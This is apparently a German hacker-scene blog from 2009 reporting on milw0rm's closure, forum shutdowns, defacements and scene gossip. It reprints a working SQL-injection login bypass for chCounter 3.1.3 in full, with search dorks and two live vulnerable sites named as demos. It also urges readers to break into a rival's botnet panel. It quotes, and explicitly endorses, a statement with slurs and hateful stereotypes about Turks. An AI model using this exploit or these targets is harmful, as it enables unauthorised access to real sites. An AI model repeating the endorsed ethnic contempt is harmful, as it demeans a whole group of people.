Goodbye milw0rm?!

Grad eben gefunden:

Well, this is my goodbye header for milw0rm. I wish I had the time I did in the past to post exploits, I just don’t :(. For the past 3 months I have actually done a pretty crappy job of getting peoples work out fast enough to be proud of, 0 to 72 hours (taking off weekends) isn’t fair to the authors on this site. I appreciate and thank everyone for their support in the past.
Be safe, /str0ke

Und auch ganz unten steht

submissions are closed.
Videos hosted by Tradebit file hosting
Copyright ┬ę 2004-2009 milw0rm

Quelle: http://milw0rm.com/

Finds echt verdammt schade und hoff das er vllt. mal zurueck kommt bzw. weiter macht ­čÖü

Btw. werd morgen muendliche Pruefung Mathematik haben.. wuenscht mir Glueck ­čÖé

Neues Hackit : >

RedTiger hat sein Hackit veroeffentlicht.

Kleiner Einfuehrungstext:

This hackit is for people who want to test their knowledge in php / sql security.
It has some similarities to h0yt3r’s and shadowleet’s but it will also test you in some logical ways of thinking.
Be honest. Dont bruteforce the passwords and dont make any solutions public.
Well I am not a friend of long speeches so just start now.

dort koennts u.a. eure SQL Injections Skills unter beweis stellen.

Zu finden ist das hackit hier: http://84.23.65.183/hackit/

Sys-Flaw schlie├čt seine Pforten!

Alte News, ich wei├č ­čśÇ Aber da ich dort als S-Moderator vertreten war, halte ich es fuer angemessen darueber zu bloggen:

tmh und ich haben beschlossen Sys-Flaw zu schlie├čen.
Die Gründe dazu sind rein privater Natur und haben nichts mit Internetgeschichten, den Usern oder Ähnlichem zu tun.
Ganz im Gegenteil: Wir wollten uns bei all unseren Mitgliedern bedanken.
Es hat immer Spa├č gemacht mit euch, ob im Forum oder im IRC-Channel (indem wir uns nat├╝rlich weiterhin treffen werden).
Danke an alle, die sich f├╝r Sys-Flaw engagiert und sich eingebracht haben.

Server: irc.datawhore.net
Port: 6667 oder 6697 (SSL)
Channel: #sys-flaw

Damit die ganzen sch├Ânen Threads nicht im Nichts verschwinden k├Ânnt ihr Sys-Flaw hier sp├Ąter als HTML-Archiv Downloaden.

Das HTML Archiv von Sys-Flaw gibts hier: *klick*

Quasi owned..

.. wuerde hoohead nun sagen ­čśÇ

Gestern am 17.04.2009 war anscheinend einiges los. Scriptload wurde “im namen von The Don” (ein Admin aus scriptzbase.org) defaced. War er natuerlich nicht, wie man sehen kann. Sowas wuerde er nie schreiben.

–>

Quelle & mehr: http://newsbox.cc/hacked-ddosed-defaced/scriptload-gehackt/

Dann folgte wieder eine Seite, diesmal undergroundimagez ein Projekt von The Don.

–>

Quelle & mehr: http://newsbox.cc/hacked-ddosed-defaced/undergroundimagez-gehackt/

Und da alle guten Dinge 3 sind, hat es danach nochmal eine gro├če Seite getroffen, naemlich Scriptzbase.org – Admins sind dort [email protected] und The Don.

Hier nochmal zuerst das kleine Statement:

Leider wurden wir die Nacht Opfer eines Hack-Angriffs
Wir bleiben nun doch erstmal Offlin bis zur kl├Ąrung
Dann erstmal sehen wie es weiter geht und ob es ├╝berhaupt weiter geht

Fuck of T├╝rke

Es ist doch immer wieder schade wie sich die schei├č Szene selber wenichten tut, Kinder ├╝bernehmen die Szene immer mehr

Scriptzbase.org hat nicht mit dem hack-Angriff auf Scriptload zu tun.

Und dann das etwas groessere:

Mehr pech kann man glaubich nicht haben, erst l├Ąuft alles schief bez├╝glich des Umzugs.
Dateiload nimmt unseren root vom Netz, ohne uns den neuen zur verf├╝gung zu stellen, dann sollen wir 1 1/2 – 2 Wochen warten,
bis der neue da ist. Darauf hatten wir aber kein bock, The Don hat stress geschoben, da wir ein reibunglosen Umzug haben wollten.
Dann stellte Dateiload uns den ALTEN wieder hin. Wegen dem Stress nahm man uns den Account Manager (zurecht), jetzt sollen wir den jetztigen root k├╝ndigen bevor wir den neuen bekommen *lol*.

In der Nacht zum 17.02 wurde ScriptzBase Opfer eines Hack-Angriffes, wie dies passiert ist, wissen wir selber noch nicht!.
Fest steht, es waren wie immer diese kleine mie├čen T├╝rken. Diese K├╝ndigen an ein Backup Online zu stellen.

Auch Speedtest von 1337-Crew versuchte uns zu Hacken, durch eine L├╝cke in VB trug er eine E-Mail adresse in die Administratoren Accounts ein, die damals noch zur seiner Seite heihachi.net f├╝hrte.
vermutlich weil ich heihachi.net als inkompetenter Hoster bezeichnete und diesen Hoster auf ScriptzBase Zensur.
Wo ich mit Account-Shop drauf gehostet habe, war meine Seite mehr down als alles andere. Hosting ist kein Kuchenbacken.

Wie es jetzt weiter geht wei├č ich noch nicht, ich habe ehrlich keine lust mehr auf ScriptzBase.
Wir stellen User vieles KOSTENLOS zur verf├╝gung, geben monatlich viel Geld f├╝r den schei├č root aus, seid es ScriptzBase gibt habe ich schon ├╝ber 3000ÔéČ daf├╝r aus gegeben.
Wozu dies alles?, f├╝r diese schei├č Szene, die nur nimmt und nichts gibt, f├╝r User die auf ScriptzBase aktiv leechen, aber Scriptzbase hassen tun, und alles daran setzen uns zu schaden, uns mit F├╝├čen Gr├Â├če 52 treten!.

Aber Ihr habt ja noch eure Englischen freunde, die Deutsche Szene wird immer mehr verschwinden, und das nur wegen dummen Leuten,
die meinen, sich beweisen zu m├╝ssen und mehr schaden anrichten als sie gutes tun.
Solche dummen Menschen werden dann auch noch bejubelt wie (Saddam Hussein) der alles in namen Allah tut!*Lach*,
damit diese sich freuen k├Ânnen.
Die T├╝rkischen hacker denken Sie tuen alles f├╝r Allah, denken wenn sie Terror laufen, Seiten hacken das diese gutes tun *Pfff*.
Sobald man eine T├╝rkische Seite hacken tut, laufen diese Terror und t├Âten Menschen, wir Deutschen essen doch lieber Kartoffeln!
T├╝rken schaden mehr das Internet als jedes andere Volk, sie verstehen nicht wof├╝r Gemeindschaft steht, Freude, Spass, Freundschaft.

Bald wird es bestimmt noch eine Deutsche Script Seite geben, die aber auch schnell offline geht *lach*
Ist das sch├Ân wenn dumme leute sich selber ins Bein schie├čen, das auch noch toll finden.

Mein motto war immer “Hack niemals Szene Seiten, es sei denn die sachden dich selber massiv” vTeam-Germany wurde damals von mir gehackt, weil dies zutraf, nicht OHNE grund.

Leute m├Âgen mich “[email protected]” nicht weil die mich nicht kennen, Sie Urteilen ├╝ber mich einfach, erz├Ąhlen schei├če, machen mit meinen Nick irgend eine schei├če auf andere Seiten. Und jetzt kommen die ganzen Kinder aus den l├Âchern die meinen etwas ├╝ber SB zu wissen, erz├Ąhlen irgend eine schei├če, wissen nichtmal was diese damit selber bezwecken wollen.

Ich werde die n├Ąchsten Tage dar├╝ber nachdenken, ob es sich noch lohnt die ganze schei├če f├╝r Leute zu machen die dich doch eigl hassen, die dir schaden wollen!.
Ob sich das lohnt, Monat f├╝r Monat gedanken zu machen woher ich das Geld f├╝r den root nehme.
Ob sich das Lohnt evtl meine zukunft durch Warez zu versauen.
Ob sich der ganze Stress und ├Ąrger Lohnt!.

In dem ScriptzBase Backup stehen IP-Adresse der User drinne, es ging einfach nicht mehr ohne logging, die User haben zu viel schei├če gebaut, wollten schaden anrichten.
Auch wenn wir auf Sicherheit der User achteten mussten wir auch selber auf Unsere achten, IP logging wollten wir nach dem Umzug Temporary machen, dazu kam es aber leider nicht mehr.
Uns war immer klar das das BKA niemals an unseren root kommen w├╝rde, wenn dann w├Ąre alles ganz schnell weg;)
User m├╝ssen aber keine Angst haben vor Besuch des BKA;), wer sich gedanken macht, macht sich l├Ącherlich;).

Auf diesen wegen Sorry f├╝r das Loggen, in der Szene geht es leider nicht mehr OHNE. 1337 macht es selber nicht anderes!.

Wie gesagt wir wissen nicht ob es ├╝berhaupt weiter geht, ich werde die Tage dar├╝ber nach denken.
Ich werde nur auf Diskussionen im Newsbox.cc Forum antworten.

Die ScriptzBase Administration
[email protected]

E-Mail: [email protected]

PS: ScriptzBase w├Ąre die Tage 2 Jahre geworden!

Quelle: http://scriptzbase.org/

Ich stimme der Aussage von [email protected] voll und ganz zu und ich denke er hat mit seinem Statement auch recht. Es gibt nur eine positive Sache zu sagen “defaces” sind wenigsten was anderes als langweiliger Dauer DDoS. Deface zeigt naemlich immerhin etwas koennen, was man bei DDoS nicht behaupten kann.

Aufjedenfall hoff ich, dass sich die Admins von Scriptzbase schnell erholen und am Projekt weitermachen.. Scriptzbase war nen tolles Forum. ­čÖé

Was gibts sonst noch interessantes zu berichten.. ah -tmh- hat mal wieder nen Exploit auf milw0rm veroeffentlicht, es handelt sich mal wieder um einen Login Bypass, sehr gefaehrlich das ganze, da man innerhalb von sekunden und ohne gro├če Anstrengung zum Admin werden kann:

########################################################################################################################
#chCounter 3.1.3 Login Bypass
#=======================================================================================================================
#
#Critical Level : Dangerous
#
#Vendor site : http://chcounter.org/
#
#Download : http://chcounter.org/chCounter3/getfile.php?id=5
#
#dorks: "chCounter 3.1.3" K├╝nftig automatisch einloggen or "chCounter 3.1.3"
#
#=======================================================================================================================
#
#
#Information :
#--------------------------------
#Need: magic quotes = off
#
#Exploit :
#--------------------------------
#
#http://www.[URL]//counter/stats/index.php
#
#Use or '=' as username and password
#
#
#Live demo :
#--------------------------------
#
#http://www.brummelliese.de/count/stats/
#http://www.fire.uni-freiburg.de/counter/welcome/stats/
#
#=======================================================================================================================
#Discovered by : -tmh- & Lainux
#
#Contact : tmh[at]sys-flaw.com
#
#Greetz to : n00bor , activebeta, Five-Three-Nine ,GabberGandalf, J0hn.X3r , electron1x , Lainux, PurpleD1amond , Sebo , Z1uX , meckl , Floo , -Patrick_B ,
#abcdef ,Loader007 , bizzit , Barbers , dev0815 , f0Gx , h0yt3r , Nemo , eddy14 , Sys-Flaw , Codesoft ,Free-Hack
#
#
########################################################################################################################

# milw0rm.com [2009-04-16]

Quelle: http://www.milw0rm.com/exploits/8461

Danke nochmal fuer das Erwaehnen in den Greetz ­čÖé

Was gibts noch aktuelles zu sagen? Vorerst nichts, wird jedoch heute noch etwas folgen ­čÖé

Wochenuebersicht

Aloha zu meiner 3ten Wochenuebersicht. Heute fasse ich mich kurz, da ich erst in 2 Tagen Ferien hab, und dann auch mehr Zeit zum Bloggen finde. Sind in letzter Zeit weniger schoene Dinge passiert, aber nun gut.

Fangen wir an. Punkt 1: Es geht mal wieder um das tolle Elite Scene Board No. 1 von luppa, auch bekannt als “Dark Matrix”. Hatte schon mehrmals von ihnen berichtet, nun kommen noch 2 Knueller:

Dark Matrix Forum wurde innerhalb von 3 Wochen nun zum 2ten Mal defaced, diesmal von T-Slide, Admin von Pro-Hack.eu, am 1. April 2009:

Wenn man sich die Signatur von luppa anschaut, sieht man gleich den Knueller Nr.2: “King of Botnet”. Der Trottel nennt sich “King Of Botnet” welches sich hier befindet: http://dark-matrix.com/botnet/ UND nicht mehr als 200 – 600 Bots hat.. das nenn ich KING! Diese Person ist sowas von laecherlich.. Vllt kann sich ja jemand den Zugang erbruten oder findet luecken.. ich wuerd alle Vics loeschen..

Punkt 2: Der 1. April war nen “unterhaltsamer” Tag, an dem einige Leute witzig sein wollten. Hier nen paar Auszuege:

– xREL.to machte einen auf “hacked” und stellte die komplette Seite in 1337 “Schrift” dar

– scriptzbase.org machte einen auf hacked/defaced und dabei wurde dann auch eine Handynummer von [email protected] (glaub ich) und die DB von account-shop.ws veroeffentlicht, war aber schlussendlich nen gro├čer Spa├č (siehe http://scriptzbase.org/showthread.php?t=24012 )

– Kartoffel-Hack Source wurde von -tmh- veroeffentlicht jedoch mit einem (anscheinend) 97 stelligem PW ­čśÇ Viel Spa├č beim Bruteforce^^

– gulli hatte auch was gebracht, wei├č aber grad nicht genau mehr was

Und najo noch einige mehr.

Punkt 3: Sebo hat sein 2filehost Projekt nun unter neuem Namen wieder geboren, naemlich┬á LoadNow.in. Ist wie 2filehost.cn damals, nen Premium Link Generator gewesen, nur diemal (Achtung Neu!) mit Megaupload ­čÖé Er plant auch eventuell Uploaded.to dazu zu nehmen. Und ich wei├č durch sichere Quellen, dass sein Projekt morgen auf eine neue Server Hardware umsteigen wird, um bessere Performance zu bieten. Was gibts noch gro├č zu sagen? Ah eine Aktion, welche ich ganz gut finde:

Punkt 4:

tr4st.NET against YouTube Spreader

Eine echt tolle Aktion. Auf tr4st.NET stellt tr4st ein paar YouTube Videos vor, mit einem anscheinenden “Easy Steam Account Hacker” oder aehnliches, bei dem Ahnungslose Leute “verarscht” werden und dann schlussendlich ihren Steam Account durch diese infizierten Tools verlieren. Ich find die Aktion echt gut, dass tr4st hier die Videos / Downloads aufdeckt und zeigt, dass es infiziert ist und wo die Logs dann landen.

Punkt 5: Scene Coderz.com sagt Ade. Ein kleiner Ausschnitt aus dem Statement:

Heute Abend ist das Fass einfach ├╝bergelaufen!

Nein es hat nichts mit dem DDoS zu tun, der t├Ąglich auf unseren Server einprasselte, auch nicht mit den Beleidigungen, welche ich t├Ąglich erntete und auch nicht weil es mir zu viel Arbeit gemacht hat Spam zu l├Âschen, die Projekte zu verwalten oder Kunden zu supporten. Nein, irgendwo hat es sich eigentlich zu einem Hobby entwickelt und ich muss sagen es war geil mit Euch. Vom Start von DelphiCoderZ bis zum heutigen Ende von SC. Wir waren eine Art gro├če Familie, doch das ist nun Geschichte. Vielen Dank an alle User und Alle die uns immer unterst├╝tzt haben. Ich will hier nun keinen genauen Grund angeben wie es dazu kam und hoffe, dass hier Niemand irgendwelchem M├╝ll erz├Ąhlt (Wir wurden weder Hacked noch busted!).

Bevor auch nur eine Anfrage kommt, ich habe den Usern versprochen, ihre Daten vertraulich zu behandeln, so wird es bleiben!
Es wird hier KEIN Backup verkauft.

ICQ: 218406

Quelle & mehr: SceneCoderZ

Finds echt schade, dass in letzter Zeit immer mehr “Scene” Seiten und Projekte gehen bzw. beendet werden. Vorallem find ich es auch schade und “schei├če”, dass es Leute gibt, die DDoS anbieten, zwar unter dem Vorwand “Scene Seiten werden nicht geDDoSt. Aber anfragen schadet nicht” – Find ich nicht in Ordnung und ich denke die meisten wissen, wen ich damit meine.

Najo das wars soweit erstmal von meiner kleinen Wochenuebersicht, hab noch bis Dienstag Schule und dann endlich Ferien, kann dann wieder etwas aktiver werden ­čśë